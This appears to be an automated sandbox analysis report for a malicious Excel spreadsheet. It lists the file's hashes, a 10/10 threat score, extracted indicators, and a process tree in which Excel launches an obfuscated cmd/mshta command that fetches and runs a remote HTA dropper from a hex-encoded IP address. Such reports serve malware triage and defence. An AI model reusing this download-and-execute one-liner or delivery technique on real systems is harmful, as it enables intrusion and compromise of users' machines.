Analysis

  • max time kernel
    181s
  • max time network
    169s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    28-01-2022 01:47

General

  • Target

    file-104.xls

  • Size

    64KB

  • MD5

    47cc3d9d43836b5b3666d4b2dc364947

  • SHA1

    e10db24aed6a79258a265d5a64e5ebabb12c0281

  • SHA256

    95f59b516215ead7bb2125a60e09fc5efc408a0d374d11538376e9b936d5d300

  • SHA512

    98e2c6b4b06a1f3411b19b77c474b2c870d5f2a8149664e475578f022595bfa94cbd901ecd366abd4fab0a5f98a332bf05273bb8cf356ec1963c22f528efc8fe

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xc12a24f5/cc.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\file-104.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:720
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0xc12a24f5/cc.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1804
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://0xc12a24f5/cc.html
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        PID:1280

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/720-54-0x000000002F151000-0x000000002F154000-memory.dmp
    Filesize

    12KB

  • memory/720-55-0x0000000071401000-0x0000000071403000-memory.dmp
    Filesize

    8KB

  • memory/720-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/720-57-0x0000000076151000-0x0000000076153000-memory.dmp
    Filesize

    8KB

  • memory/720-59-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB